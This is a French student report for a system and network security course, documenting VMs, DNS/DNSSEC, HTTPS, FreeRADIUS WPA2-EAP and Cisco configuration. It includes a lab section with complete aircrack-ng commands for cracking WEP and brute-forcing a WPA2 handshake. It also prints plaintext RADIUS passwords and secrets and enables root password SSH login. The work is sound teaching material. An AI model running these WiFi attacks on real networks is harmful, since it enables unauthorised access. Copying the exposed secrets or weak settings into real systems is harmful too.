Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

= Vérifications et tests =

Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.

== Services Web ==

=== Sur Moon (machine de services) ===
Vérification de l’écoute Apache sur les ports 80 et 443 :
<syntaxhighlight lang="bash">
ss -tlnp | grep -E ':80|:443'
</syntaxhighlight>
<pre>
LISTEN 0 128 *:80 *:* users:(("apache2",pid=16838,fd=4),("apache2",pid=16837,fd=4),("apache2",pid=7274,fd=4))
LISTEN 0 128 *:443 *:* users:(("apache2",pid=16838,fd=6),("apache2",pid=16837,fd=6),("apache2",pid=7274,fd=6))
</pre>

Test d’accès HTTPS en local (IPv6) :
<syntaxhighlight lang="bash">
curl -6 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:38 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

=== Sur Solstice (machine mandataire) ===
Test d’accès HTTPS via le proxy inverse (IPv4) :
<syntaxhighlight lang="bash">
curl -4 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:55 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

Vérification des règles NAT :
<syntaxhighlight lang="bash">
iptables -t nat -L POSTROUTING -n -v
</syntaxhighlight>
<pre>
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)
pkts bytes target prot opt in out source destination
18528 1577K MASQUERADE 0 -- * eth1 0.0.0.0/0 0.0.0.0/0
3254 225K MASQUERADE 0 -- * eth0 10.60.15.0/24 0.0.0.0/0
</pre>
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.

== fail2ban ==

=== Sur Solstice ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 12792
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 4
|- Total banned: 3114
`- Banned IP list: 134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119
</pre>

=== Sur Moon ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 1
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 0
|- Total banned: 0
`- Banned IP list:
</pre>

== WPA2‑EAP – FreeRADIUS (sur Moon) ==
Statut du service :
<syntaxhighlight lang="bash">
systemctl status freeradius
</syntaxhighlight>
<pre>
● freeradius.service - FreeRADIUS multi-protocol policy server
Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)
Active: active (running) since ...
</pre>

Test d’authentification local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 1812 testing123
</syntaxhighlight>
<pre>
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</pre>

Configuration du client RADIUS (point d’accès) extraite de <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}
</pre>

== WPA2‑EAP – Point d’accès (wifi‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>

Vérification du SSID et de son VLAN :
<pre>
wifi-E304#show dot11 ssid VM_SERVICES_15
SSID Name : VM_SERVICES_15
Status : Enabled
Broadcast SSID : Enabled
VLAN : 25
Authentication Methods : Open EAP, Network-EAP
WPA Key Management : WPA2
</pre>

Vérification des serveurs RADIUS configurés :
<pre>
wifi-E304#show running-config | include radius-server
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56
...
</pre>

Statistiques RADIUS :
<pre>
wifi-E304#show aaa servers
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813
State: current UP, duration 794495s
Authen: request 2076, timeouts 1646
Transaction: success 430, failure 411
...
</pre>

Test d’authentification :
<pre>
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy
Attempting authentication test to server-group radius_student25 using radius
User was successfully authenticated.
</pre>

Clients associés :
<pre>
wifi-E304#show dot11 associations
802.11 Client Stations on Dot11Radio1:
SSID [VM_SERVICES_15] :
MAC Address IP address Device Name Parent State
a0b3.395a.dcc8 10.60.15.153 unknown - self EAP-Assoc
</pre>

État du VLAN 25 sur l’AP :
<pre>
wifi-E304#show vlan 25
Virtual LAN ID: 25 (IEEE 802.1Q Encapsulation)
vLAN Trunk Interfaces: Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25
</pre>

== WPA2‑EAP – Routeur central (C9200‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Vérification du VLAN 25 :
<pre>
C9200-E304#show vlan brief | include 25
25 E15-MSalhi active
</pre>

Interface VLAN 25 :
<pre>
C9200-E304#show ip interface brief | include Vlan25
Vlan25 10.60.15.2 YES manual up up
C9200-E304#show ipv6 interface brief | include Vlan25
Vlan25 [up/up]
</pre>

VRRP pour VLAN 25 :
<pre>
C9200-E304#show vrrp brief | include 25
Vl25 25 IPv4 110 0 N Y MASTER 10.60.15.2(local) 10.60.15.1

C9200-E304#show vrrp Vlan25
Vlan25 - Group 25 - Address-Family IPv4
State is MASTER
Virtual IP address is 10.60.15.1
Priority is 110
Master Router is 10.60.15.2 (local)
</pre>

DHCP :
<pre>
C9200-E304#show ip dhcp pool
...
Pool PoolSalhi :
Utilization mark (high/low) : 100 / 0
Total addresses : 254
Leased addresses : 1
Excluded addresses : 150
Current index IP address range Leased/Excluded/Total
10.60.15.156 10.60.15.1 - 10.60.15.254 1 / 150 / 254

C9200-E304#show ip dhcp binding | include 10.60.15
10.60.15.153 ff39.5adc.c800.0100. Feb 27 2026 08:59 PM Automatic Active Vlan25
</pre>

Policy‑Based Routing (PBR) :
<pre>
C9200-E304#show route-map PBR_VLAN25
route-map PBR_VLAN25, permit, sequence 10
Match clauses:
ip address (access-lists): TRAFIC_VLAN25
Set clauses:
ip next-hop 193.48.57.167
Policy routing matches: 3128 packets, 1082288 bytes

C9200-E304#show ip access-lists TRAFIC_VLAN25
Extended IP access list TRAFIC_VLAN25
10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)

C9200-E304#show ip policy
Interface Route map
Vlan25 PBR_VLAN25
</pre>

Trunk vers le point d’accès :
<pre>
C9200-E304#show interfaces trunk
Port Mode Encapsulation Status Native vlan
Gi1/0/1 on 802.1q trunking 1

Port Vlans allowed and active in management domain
Gi1/0/1 1-2,11-12,15-16,19-20,23-25,28,530

C9200-E304#show interfaces GigabitEthernet1/0/1 switchport
Name: Gi1/0/1
Switchport: Enabled
Administrative Mode: trunk
Operational Mode: trunk
Trunking VLANs Enabled: ALL
</pre>

== Réseau basique et avancé ==

Routes sur E304 :
<pre>
C9200-E304#show ip route | include 10.60.15
C 10.60.15.0/24 is directly connected, Vlan25

C9200-E304#show ip route 0.0.0.0
Gateway of last resort is 193.48.57.162 to network 0.0.0.0
O*E2 0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2
</pre>

Connectivité depuis Moon vers la passerelle VLAN 25 :
<syntaxhighlight lang="bash">
ping -c 3 10.60.15.1
</syntaxhighlight>
<pre>
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms

--- 10.60.15.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms

----

= Conclusion =
L’infrastructure déployée répond à toutes les exigences du projet :
* Virtualisation Xen avec séparation des rôles (services / mandataire)
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4
* Filtrage des attaques par fail2ban
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS
* Tests d’intrusion concluants sur WEP et WPA2‑PSK
* Chiffrement de données avec LUKS

L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.

Atelier SysRes SE4 2025/2026 E15

2026-02-27T12:10:38Z

Msalhi :

<div class="titlepage">

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Rapport de Projet SE4 IdO''' '''Année Universitaire 2025-2026'''

'''Étudiant: Mohamed SALHI''' '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''
</div>
= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.

----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
